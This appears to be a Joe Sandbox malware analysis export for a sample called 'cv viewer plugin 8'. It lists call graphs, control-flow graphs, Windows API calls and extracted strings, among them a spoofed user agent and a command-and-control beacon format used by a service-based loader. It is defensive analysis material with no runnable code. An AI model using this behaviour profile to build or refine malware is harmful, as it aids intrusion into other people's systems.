21494 404efc 21492->21494 21493->21484 21494->21493 21496 404db6 21494->21496 21499 404dc3 21496->21499 21497 404e73 21497->21493 21498 404de4 VirtualFree 21498->21499 21499->21497 21499->21498 21501 404d60 VirtualFree 21499->21501 21502 404d7d 21501->21502 21503 404dad 21502->21503 21504 404d8d HeapFree 21502->21504 21503->21499 21504->21499 21506 402ca3 21505->21506 21508 403008 21505->21508 21506->21457 21508->21506 21509 40302d 21508->21509 21510 403051 21509->21510 21511 40303c 21509->21511 21513 403090 HeapAlloc 21510->21513 21517 40304a 21510->21517 21524 404f14 21510->21524 21511->21517 21518 404767 21511->21518 21514 40309f 21513->21514 21514->21508 21515 40304f 21515->21508 21517->21513 21517->21514 21517->21515 21521 404799 21518->21521 21519 404838 21523 404847 21519->21523 21538 404b21 21519->21538 21521->21519 21521->21523 21531 404a70 21521->21531 21523->21517 21525 404f22 21524->21525 21526 40500e VirtualAlloc 21525->21526 21527 4050e3 21525->21527 21530 404fdf 21525->21530 21526->21530 21542 404c1c 21527->21542 21530->21517 21530->21530 21532 404ab3 HeapAlloc 21531->21532 21533 404a83 HeapReAlloc 21531->21533 21535 404ad9 VirtualAlloc 21532->21535 21537 404b03 21532->21537 21534 404aa2 21533->21534 21533->21537 21534->21532 21536 404af3 HeapFree 21535->21536 21535->21537 21536->21537 21537->21519 21539 404b33 VirtualAlloc 21538->21539 21541 404b7c 21539->21541 21541->21523 21543 404c30 HeapAlloc 21542->21543 21544 404c29 21542->21544 21545 404c4d VirtualAlloc 21543->21545 21550 404c85 21543->21550 21544->21545 21546 404d42 21545->21546 21547 404c6d VirtualAlloc 21545->21547 21548 404d4a HeapFree 21546->21548 21546->21550 21549 404d34 VirtualFree 21547->21549 21547->21550 21548->21550 21549->21546 21550->21530 21551 402eb0 GetVersion 21575 403ff4 HeapCreate 21551->21575 21553 402f0f 21554 402f14 21553->21554 21555 402f1c 21553->21555 21650 402fcb 21554->21650 21587 403cd4 21555->21587 21559 402f24 GetCommandLineA 21601 403ba2 21559->21601 21563 402f3e 21633 40389c 21563->21633 21565 402f43 21566 402f48 GetStartupInfoA 21565->21566 21646 403844 21566->21646 21568 402f5a GetModuleHandleA 21570 402f7e 21568->21570 21656 4035eb 21570->21656 21576 404014 21575->21576 21577 40404a 21575->21577 21663 403eac 21576->21663 21577->21553 21580 404030 21583 40404d 21580->21583 21585 404c1c 5 API calls 21580->21585 21581 404023 21675 4043cb HeapAlloc 21581->21675 21583->21553 21584 40402d 21584->21583 21586 40403e HeapDestroy 21584->21586 21585->21584 21586->21577 21731 402fef 21587->21731 21590 403cf3 GetStartupInfoA 21598 403e04 21590->21598 21600 403d3f 21590->21600 21593 403e6b SetHandleCount 21593->21559 21594 403e2b GetStdHandle 21596 403e39 GetFileType 21594->21596 21594->21598 21595 402fef 12 API calls 21595->21600 21596->21598 21597 403db0 21597->21598 21599 403dd2 GetFileType 21597->21599 21598->21593 21598->21594 21599->21597 21600->21595 21600->21597 21600->21598 21602 403bf0 21601->21602 21603 403bbd GetEnvironmentStringsW 21601->21603 21605 403bc5 21602->21605 21606 403be1 21602->21606 21604 403bd1 GetEnvironmentStrings 21603->21604 21603->21605 21604->21606 21607 402f34 21604->21607 21608 403c09 WideCharToMultiByte 21605->21608 21609 403bfd GetEnvironmentStringsW 21605->21609 21606->21607 21610 403c83 GetEnvironmentStrings 21606->21610 21611 403c8f 21606->21611 21624 403955 21607->21624 21613 403c3d 21608->21613 21614 403c6f FreeEnvironmentStringsW 21608->21614 21609->21607 21609->21608 21610->21607 21610->21611 21616 402fef 12 API calls 21611->21616 21615 402fef 12 API calls 21613->21615 21614->21607 21617 403c43 21615->21617 21622 403caa 21616->21622 21617->21614 21618 403c4c WideCharToMultiByte 21617->21618 21620 403c66 21618->21620 21621 403c5d 21618->21621 21619 403cc0 FreeEnvironmentStringsA 21619->21607 21620->21614 21623 4030a1 7 API calls 21621->21623 21622->21619 21623->21620 21625 403967 21624->21625 21626 40396c GetModuleFileNameA 21624->21626 21760 4061b4 21625->21760 21628 40398f 21626->21628 21629 402fef 12 API calls 21628->21629 21630 4039b0 21629->21630 21631 4039c0 21630->21631 21632 402fa6 7 API calls 21630->21632 21631->21563 21632->21631 21634 4038a9 21633->21634 21637 4038ae 21633->21637 21635 4061b4 19 API calls 21634->21635 21635->21637 21636 402fef 12 API calls 21638 4038db 21636->21638 21637->21636 21639 402fa6 7 API calls 21638->21639 21640 4038ef 21638->21640 21639->21640 21643 403932 21640->21643 21644 402fef 12 API calls 21640->21644 21645 402fa6 7 API calls 21640->21645 21641 4030a1 7 API calls 21642 40393e 21641->21642 21642->21565 21643->21641 21644->21640 21645->21640 21647 40384d 21646->21647 21649 403852 21646->21649 21648 4061b4 19 API calls 21647->21648 21648->21649 21649->21568 21651 402fd4 21650->21651 21652 402fd9 21650->21652 21654 404224 7 API calls 21651->21654 21653 40425d 7 API calls 21652->21653 21655 402fe2 ExitProcess 21653->21655 21654->21652 21784 40360d 21656->21784 21659 4036c0 21660 4036cc 21659->21660 21661 4037f5 UnhandledExceptionFilter 21660->21661 21662 402f98 21660->21662 21661->21662 21677 402d40 21663->21677 21666 403ed5 21667 403eef GetEnvironmentVariableA 21666->21667 21668 403ee7 21666->21668 21670 403f0e 21667->21670 21674 403fcc 21667->21674 21668->21580 21668->21581 21671 403f53 GetModuleFileNameA 21670->21671 21672 403f4b 21670->21672 21671->21672 21672->21674 21679 4061d0 21672->21679 21674->21668 21682 403e7f GetModuleHandleA 21674->21682 21676 4043e7 21675->21676 21676->21584 21678 402d4c GetVersionExA 21677->21678 21678->21666 21678->21667 21684 4061e7 21679->21684 21683 403e96 21682->21683 21683->21668 21686 4061ff 21684->21686 21688 40622f 21686->21688 21691 4053a6 21686->21691 21687 4061e3 21687->21674 21688->21687 21689 4053a6 6 API calls 21688->21689 21695 4073ab 21688->21695 21689->21688 21692 4053c4 21691->21692 21694 4053b8 21691->21694 21701 40670e 21692->21701 21694->21686 21696 4073d6 21695->21696 21697 4073b9 21695->21697 21698 4073f2 21696->21698 21699 4053a6 6 API calls 21696->21699 21697->21688 21698->21697 21713 406857 21698->21713 21699->21698 21702 406757 21701->21702 21703 40673f GetStringTypeW 21701->21703 21705 406782 GetStringTypeA 21702->21705 21706 4067a6 21702->21706 21703->21702 21704 40675b GetStringTypeA 21703->21704 21704->21702 21707 406843 21704->21707 21705->21707 21706->21707 21709 4067bc MultiByteToWideChar 21706->21709 21707->21694 21709->21707 21710 4067e0 21709->21710 21710->21707 21711 40681a MultiByteToWideChar 21710->21711 21711->21707 21712 406833 GetStringTypeW 21711->21712 21712->21707 21714 406887 LCMapStringW 21713->21714 21715 4068a3 21713->21715 21714->21715 21716 4068ab LCMapStringA 21714->21716 21717 406909 21715->21717 21718 4068ec LCMapStringA 21715->21718 21716->21715 21719 4069e5 21716->21719 21717->21719 21720 40691f MultiByteToWideChar 21717->21720 21718->21719 21719->21697 21720->21719 21721 406949 21720->21721 21721->21719 21722 40697f MultiByteToWideChar 21721->21722 21722->21719 21723 406998 LCMapStringW 21722->21723 21723->21719 21724 4069b3 21723->21724 21725 4069b9 21724->21725 21726 4069f9 21724->21726 21725->21719 21727 4069c7 LCMapStringW 21725->21727 21726->21719 21728 406a31 LCMapStringW 21726->21728 21727->21719 21728->21719 21729 406a49 WideCharToMultiByte 21728->21729 21729->21719 21732 403001 12 API calls 21731->21732 21733 402ffe 21732->21733 21733->21590 21734 402fa6 21733->21734 21735 402fb4 21734->21735 21736 402faf 21734->21736 21746 40425d 21735->21746 21740 404224 21736->21740 21741 40422e 21740->21741 21742 40425b 21741->21742 21743 40425d 7 API calls 21741->21743 21742->21735 21744 404245 21743->21744 21745 40425d 7 API calls 21744->21745 21745->21742 21749 404270 21746->21749 21747 402fbd 21747->21590 21748 404387 21752 40439a GetStdHandle WriteFile 21748->21752 21749->21747 21749->21748 21750 4042b0 21749->21750 21750->21747 21751 4042bc GetModuleFileNameA 21750->21751 21753 4042d4 21751->21753 21752->21747 21755 406578 21753->21755 21756 406585 LoadLibraryA 21755->21756 21758 4065c7 21755->21758 21757 406596 GetProcAddress 21756->21757 21756->21758 21757->21758 21759 4065ad GetProcAddress GetProcAddress 21757->21759 21758->21747 21759->21758 21761 4061bd 21760->21761 21762 4061c4 21760->21762 21764 405df0 21761->21764 21762->21626 21771 405f89 21764->21771 21766 405f7d 21766->21762 21769 405e33 GetCPInfo 21770 405e47 21769->21770 21770->21766 21776 40602f GetCPInfo 21770->21776 21772 405fa9 21771->21772 21773 405f99 GetOEMCP 21771->21773 21774 405e01 21772->21774 21775 405fae GetACP 21772->21775 21773->21772 21774->21766 21774->21769 21774->21770 21775->21774 21777 40611a 21776->21777 21780 406052 21776->21780 21777->21766 21778 40670e 6 API calls 21779 4060ce 21778->21779 21781 406857 9 API calls 21779->21781 21780->21778 21782 4060f2 21781->21782 21783 406857 9 API calls 21782->21783 21783->21777 21785 403619 GetCurrentProcess TerminateProcess 21784->21785 21786 40362a 21784->21786 21785->21786 21787 402f87 21786->21787 21788 403694 ExitProcess 21786->21788 21787->21659 21789 16df87f ReadFile 21790 16e7292 21789->21790 21791 40d433 21792 40d43b 21791->21792 21795 401f64 FindResourceA 21792->21795 21794 40d5f9 21796 401f86 GetLastError SizeofResource 21795->21796 21797 401f9f 21795->21797 21796->21797 21798 401fa6 LoadResource LockResource GlobalAlloc 21796->21798 21797->21794 21799 401fd2 21798->21799 21800 401ffb GetTickCount 21799->21800 21802 402005 GlobalAlloc 21800->21802 21802->21797 21803 40d458 21804 40d45c StartServiceCtrlDispatcherA 21803->21804 21805 16f99f2 21806 17127b6 21805->21806 21807 17127bb 21806->21807 21809 16e2599 21806->21809 21810 172baf4 WriteFile 21809->21810 21811 40d0df 21812 40d027 21811->21812 21812->21811 21813 40d502 21812->21813 21815 40212f 21812->21815 21813->21813 21816 40d5ae VirtualAlloc 21815->21816

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 213 16a6487-16a66ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 16a42c7 GetTickCount call 16a605a GetVersionExA call 16b4af0 call 16b2fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 16b4af0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 16b2fac * 4 QueryPerformanceCounter Sleep call 16b2fac * 2 call 16b4af0 * 2 258 16a66f0-16a66f2 213->258 259 16a66fb-16a66fd 258->259 260 16a66f4-16a66f9 258->260 261 16a670a-16a673e RtlEnterCriticalSection RtlLeaveCriticalSection 259->261 262 16a66ff 259->262 263 16a6704 Sleep 260->263 264 16a678e 261->264 265 16a6740-16a674c 261->265 262->263 263->261 266 16a6792-16a72bf InternetOpenA 264->266 265->264 267 16a674e-16a675b 265->267 271 16a7385-16a738b 266->271 272 16a72c5-16a733c InternetSetOptionA * 3 call 16b4af0 InternetOpenUrlA 266->272 269 16a675d-16a6761 267->269 270 16a6763-16a6764 267->270 273 16a6768-16a678c call 16b4af0 * 2 269->273 270->273 275 16a738d-16a7393 271->275 276 16a73a7-16a73b5 271->276 284 16a737e-16a737f InternetCloseHandle 272->284 285 16a733e 272->285 273->266 280 16a7399-16a73a6 call 16a53ec 275->280 281 16a7395-16a7397 275->281 276->258 278 16a73bb-16a73df call 16b4af0 call 16a439c 276->278 278->258 296 16a73e5-16a7413 RtlEnterCriticalSection RtlLeaveCriticalSection call 16b233c 278->296 280->276 281->276 284->271 291 16a7342-16a7368 InternetReadFile 285->291 293 16a736a-16a7371 291->293 294 16a7373-16a737a InternetCloseHandle 291->294 293->291 294->284 299 16a7469-16a7484 call 16b233c 296->299 300 16a7415-16a7427 call 16b233c 296->300 305 16a748a-16a748c 299->305 306 16a773e-16a7750 call 16b233c 299->306 300->299 307 16a7429-16a743b call 16b233c 300->307 305->306 308 16a7492-16a7544 call 16b2fac RtlEnterCriticalSection RtlLeaveCriticalSection call 16b4af0 * 5 call 16a439c * 2 305->308 316 16a7799-16a77ab call 16b233c 306->316 317 16a7752-16a7754 306->317 307->299 314 16a743d-16a744f call 16b233c 307->314 373 16a7581 308->373 374 16a7546-16a7548 308->374 314->299 326 16a7451-16a7463 call 16b233c 314->326 327 16a77cc-16a77de call 16b233c 316->327 328 16a77ad-16a77bb call 16a61f1 call 16a62ff 316->328 317->316 321 16a7756-16a7794 call 16b4af0 RtlEnterCriticalSection RtlLeaveCriticalSection 317->321 321->258 326->258 326->299 341 16a7afc-16a7b0e call 16b233c 327->341 342 16a77e4-16a77e6 327->342 344 16a77c0-16a77c7 call 16a640a 328->344 341->258 354 16a7b14-16a7b42 call 16b2fac call 16b4af0 call 16a439c 341->354 342->341 346 16a77ec-16a7803 call 16a439c 342->346 344->258 346->258 355 16a7809-16a78d7 call 16b2418 call 16a1ba7 346->355 375 16a7b4b-16a7b52 call 16b2f74 354->375 376 16a7b44-16a7b46 call 16a534d 354->376 371 16a78d9 call 16a143f 355->371 372 16a78de-16a78ff RtlEnterCriticalSection 355->372 371->372 379 16a790b-16a796f RtlLeaveCriticalSection call 16a3c67 call 16a3d7e call 16a833b 372->379 380 16a7901-16a7908 372->380 377 16a7585-16a75b3 call 16b2fac call 16b4af0 call 16a439c 373->377 374->373 381 16a754a-16a755c call 16b233c 374->381 375->258 376->375 404 16a75f4-16a75fd call 16b2f74 377->404 405 16a75b5-16a75c4 call 16b35e6 377->405 402 16a7ae3-16a7af7 call 16a9003 379->402 403 16a7975-16a79bd call 16aa725 379->403 380->379 381->373 393 16a755e-16a757f call 16a439c 381->393 393->377 402->258 414 16a7aad-16a7ade call 16a83ea call 16a33b2 403->414 415 16a79c3-16a79ca 403->415 416 16a7603-16a761b call 16b3b4c 404->416 417 16a7734-16a7737 404->417 405->404 418 16a75c6 405->418 414->402 420 16a79cd-16a79d2 415->420 430 16a761d-16a7625 call 16a9737 416->430 431 16a7627 416->431 417->306 422 16a75cb-16a75dd call 16b2850 418->422 420->420 424 16a79d4-16a7a1f call 16aa725 420->424 432 16a75df 422->432 433 16a75e2-16a75f2 call 16b35e6 422->433 424->414 439 16a7a25-16a7a2b 424->439 436 16a7629-16a76cb call 16aa84f call 16a3863 call 16a5119 call 16a3863 call 16aaaf5 call 16aac0f 430->436 431->436 432->433 433->404 433->422 459 16a76d0-16a76e1 436->459 443 16a7a2e-16a7a33 439->443 443->443 445 16a7a35-16a7a70 call 16aa725 443->445 445->414 451 16a7a72-16a7aa6 call 16ad117 445->451 454 16a7aab-16a7aac 451->454 454->414 460 16a76e8-16a7713 Sleep call 16b18f0 459->460 461 16a76e3 call 16a380b 459->461 465 16a771f-16a772d 460->465 466 16a7715-16a771e call 16a4100 460->466 461->460 465->417 468 16a772f call 16a380b 465->468 466->465 468->417
                                                    APIs
                                                    • RtlInitializeCriticalSection.NTDLL(016D71E0), ref: 016A64B6
                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 016A64CD
                                                    • GetProcAddress.KERNEL32(00000000), ref: 016A64D6
                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 016A64E5
                                                    • GetProcAddress.KERNEL32(00000000), ref: 016A64E8
                                                    • GetTickCount.KERNEL32 ref: 016A64F4
                                                      • Part of subcall function 016A605A: _malloc.LIBCMT ref: 016A6068
                                                    • GetVersionExA.KERNEL32(016D7038), ref: 016A6521
                                                    • _memset.LIBCMT ref: 016A6540
                                                    • _malloc.LIBCMT ref: 016A654D
                                                      • Part of subcall function 016B2FAC: __FF_MSGBANNER.LIBCMT ref: 016B2FC3
                                                      • Part of subcall function 016B2FAC: __NMSG_WRITE.LIBCMT ref: 016B2FCA
                                                      • Part of subcall function 016B2FAC: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 016B2FEF
                                                    • _malloc.LIBCMT ref: 016A655D
                                                    • _malloc.LIBCMT ref: 016A6568
                                                    • _malloc.LIBCMT ref: 016A6573
                                                    • _malloc.LIBCMT ref: 016A657E
                                                    • _malloc.LIBCMT ref: 016A6589
                                                    • _malloc.LIBCMT ref: 016A6594
                                                    • _malloc.LIBCMT ref: 016A65A3
                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 016A65BA
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 016A65C3
                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 016A65D2
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 016A65D5
                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 016A65E0
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 016A65E3
                                                    • _memset.LIBCMT ref: 016A65F6
                                                    • _memset.LIBCMT ref: 016A6602
                                                    • _memset.LIBCMT ref: 016A660F
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A661D
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A662A
                                                    • _malloc.LIBCMT ref: 016A664E
                                                    • _malloc.LIBCMT ref: 016A665C
                                                    • _malloc.LIBCMT ref: 016A6663
                                                    • _malloc.LIBCMT ref: 016A6689
                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 016A669C
                                                    • Sleep.KERNELBASE ref: 016A66AA
                                                    • _malloc.LIBCMT ref: 016A66B6
                                                    • _malloc.LIBCMT ref: 016A66C3
                                                    • _memset.LIBCMT ref: 016A66D8
                                                    • _memset.LIBCMT ref: 016A66E8
                                                    • Sleep.KERNELBASE(0000EA60), ref: 016A6704
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A670F
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A6720
                                                    • _memset.LIBCMT ref: 016A6775
                                                    • _memset.LIBCMT ref: 016A6784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                    • API String ID: 2251652938-2678694477
                                                    • Opcode ID: 8bb8ebbe3da68e79535ab094c31bc29a28d420230f85810e9a58381d2b79dc08
                                                    • Instruction ID: 695cc6af186b894ed908cf7cb690f2bf56e2135c8d1d346610f9991ccaeeb4c5
                                                    • Opcode Fuzzy Hash: 8bb8ebbe3da68e79535ab094c31bc29a28d420230f85810e9a58381d2b79dc08
                                                    • Instruction Fuzzy Hash: 2371F2B1D48340AFD3206F749C88B6B7BE9EF95710F04082EF98597291DBB49840CF9A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 713 401b4b-401b68 LoadLibraryA 714 401c21-401c25 713->714 715 401b6e-401b7f GetProcAddress 713->715 716 401b85-401b8e 715->716 717 401c18-401c1b FreeLibrary 715->717 718 401b95-401ba5 GetAdaptersInfo 716->718 717->714 719 401ba7-401bb0 718->719 720 401bdb-401be3 718->720 723 401bc1-401bd7 call 402cc0 call 4018cc 719->723 724 401bb2-401bb6 719->724 721 401be5-401beb call 402ca6 720->721 722 401bec-401bf0 720->722 721->722 726 401bf2-401bf6 722->726 727 401c15-401c17 722->727 723->720 724->720 728 401bb8-401bbf 724->728 726->727 731 401bf8-401bfb 726->731 727->717 728->723 728->724 733 401c06-401c13 call 402c98 731->733 734 401bfd-401c03 731->734 733->718 733->727 734->733
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                    • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                    • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                    • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                    • API String ID: 514930453-3667123677
                                                    • Opcode ID: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                    • Instruction ID: 38440359ad4724572ca0372a4bc8090c683b298b5ffde01d95b1867a6a9b844d
                                                    • Opcode Fuzzy Hash: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                    • Instruction Fuzzy Hash: F921B870904109AFEF119F65C9447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 739 401f64-401f84 FindResourceA 740 401f86-401f9d GetLastError SizeofResource 739->740 741 401f9f-401fa1 739->741 740->741 742 401fa6-401fec LoadResource LockResource GlobalAlloc call 402900 * 2 740->742 743 402096-40209a 741->743 748 401fee-401ff9 742->748 748->748 749 401ffb-402003 GetTickCount 748->749 750 402032-402038 749->750 751 402005-402007 749->751 752 402053-402083 GlobalAlloc call 401c26 750->752 753 40203a-40204a 750->753 751->752 754 402009-40200f 751->754 759 402088-402093 752->759 755 40204c 753->755 756 40204e-402051 753->756 754->752 758 402011-402023 754->758 755->756 756->752 756->753 760 402025 758->760 761 402027-40202a 758->761 759->743 760->761 761->758 762 40202c-40202e 761->762 762->754 763 402030 762->763 763->752
                                                    APIs
                                                    • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                    • GetLastError.KERNEL32 ref: 00401F86
                                                    • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                    • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                    • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                    • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                    • GetTickCount.KERNEL32 ref: 00401FFB
                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                    • String ID:
                                                    • API String ID: 564119183-0
                                                    • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                    • Instruction ID: 5f40b5bb2c798fd06435bc38b1d437300a77b6e6fc54339f6675bf13ecd45336
                                                    • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                    • Instruction Fuzzy Hash: 45314E71A00255AFDB105FB59F8896F7F68EF45344F10807AFE86F7281DA748845C7A8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 787 16af9a7-16af9ca LoadLibraryA 788 16afa8a-16afa91 787->788 789 16af9d0-16af9de GetProcAddress 787->789 790 16afa83-16afa84 FreeLibrary 789->790 791 16af9e4-16af9f4 789->791 790->788 792 16af9f6-16afa02 GetAdaptersInfo 791->792 793 16afa3a-16afa42 792->793 794 16afa04 792->794 795 16afa4b-16afa50 793->795 796 16afa44-16afa4a call 16b37a8 793->796 797 16afa06-16afa0d 794->797 799 16afa7e-16afa82 795->799 800 16afa52-16afa55 795->800 796->795 801 16afa0f-16afa13 797->801 802 16afa17-16afa1f 797->802 799->790 800->799 804 16afa57-16afa5c 800->804 801->797 805 16afa15 801->805 806 16afa22-16afa27 802->806 808 16afa69-16afa74 call 16b3b4c 804->808 809 16afa5e-16afa66 804->809 805->793 806->806 807 16afa29-16afa36 call 16af6f6 806->807 807->793 808->799 814 16afa76-16afa79 808->814 809->808 814->792
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 016AF9BD
                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 016AF9D6
                                                    • GetAdaptersInfo.IPHLPAPI(?,?), ref: 016AF9FB
                                                    • FreeLibrary.KERNEL32(00000000), ref: 016AFA84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                    • API String ID: 514930453-3114217049
                                                    • Opcode ID: c9ac618ae6cda7b9096a9e27de6a01d2cb30ce71798d9f6638ee1b4c2d05468a
                                                    • Instruction ID: e582c142a39e5a121d6d805e2819c65ebbb69b767e5a5b2a6fccc78dd4321db4
                                                    • Opcode Fuzzy Hash: c9ac618ae6cda7b9096a9e27de6a01d2cb30ce71798d9f6638ee1b4c2d05468a
                                                    • Instruction Fuzzy Hash: 54219175A00209EFDB21CAAD9C94AEEBBB8AF05310F5441E9DA05E7301D7308E45CFA6

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 815 16a2b95-16a2baf 816 16a2bb1-16a2bb9 call 16b0b10 815->816 817 16a2bc7-16a2bcb 815->817 825 16a2bbf-16a2bc2 816->825 819 16a2bdf 817->819 820 16a2bcd-16a2bd0 817->820 823 16a2be2-16a2c11 WSASetLastError WSARecv call 16aa509 819->823 820->819 822 16a2bd2-16a2bdd call 16b0b10 820->822 822->825 827 16a2c16-16a2c1d 823->827 828 16a2d30 825->828 830 16a2c1f-16a2c2a call 16b0b10 827->830 831 16a2c2c-16a2c32 827->831 832 16a2d32-16a2d38 828->832 840 16a2c3f-16a2c42 830->840 834 16a2c46-16a2c48 831->834 835 16a2c34-16a2c39 call 16b0b10 831->835 838 16a2c4a-16a2c4d 834->838 839 16a2c4f-16a2c60 call 16b0b10 834->839 835->840 842 16a2c66-16a2c69 838->842 839->832 839->842 840->834 844 16a2c6b-16a2c6d 842->844 845 16a2c73-16a2c76 842->845 844->845 847 16a2d22-16a2d2d call 16a1996 844->847 845->828 848 16a2c7c-16a2c9a call 16b0b10 call 16a166f 845->848 847->828 855 16a2cbc-16a2cfa WSASetLastError select call 16aa509 848->855 856 16a2c9c-16a2cba call 16b0b10 call 16a166f 848->856 862 16a2d08 855->862 863 16a2cfc-16a2d06 call 16b0b10 855->863 856->828 856->855 865 16a2d0a-16a2d12 call 16b0b10 862->865 866 16a2d15-16a2d17 862->866 870 16a2d19-16a2d1d 863->870 865->866 866->828 866->870 870->823
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A2BE4
                                                    • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 016A2C07
                                                      • Part of subcall function 016AA509: WSAGetLastError.WS2_32(00000000,?,?,016A2A51), ref: 016AA517
                                                    • WSASetLastError.WS2_32 ref: 016A2CD3
                                                    • select.WS2_32(?,?,00000000,00000000,00000000), ref: 016A2CE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Recvselect
                                                    • String ID: 3'
                                                    • API String ID: 886190287-280543908
                                                    • Opcode ID: d796e8d20f4aec4a0b6b43fac05b14bfda4bf3309a3584bb5bca86fc97c216ee
                                                    • Instruction ID: 6908f7fbe57fe334ad0b201e42be6724914b3ea57fbed6dd0db7de6d3db9f11d
                                                    • Opcode Fuzzy Hash: d796e8d20f4aec4a0b6b43fac05b14bfda4bf3309a3584bb5bca86fc97c216ee
                                                    • Instruction Fuzzy Hash: 4D41BEB15143068FDB20AF68CC643ABBBE9AF98358F500D1EE495C3281EB70D8408F91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
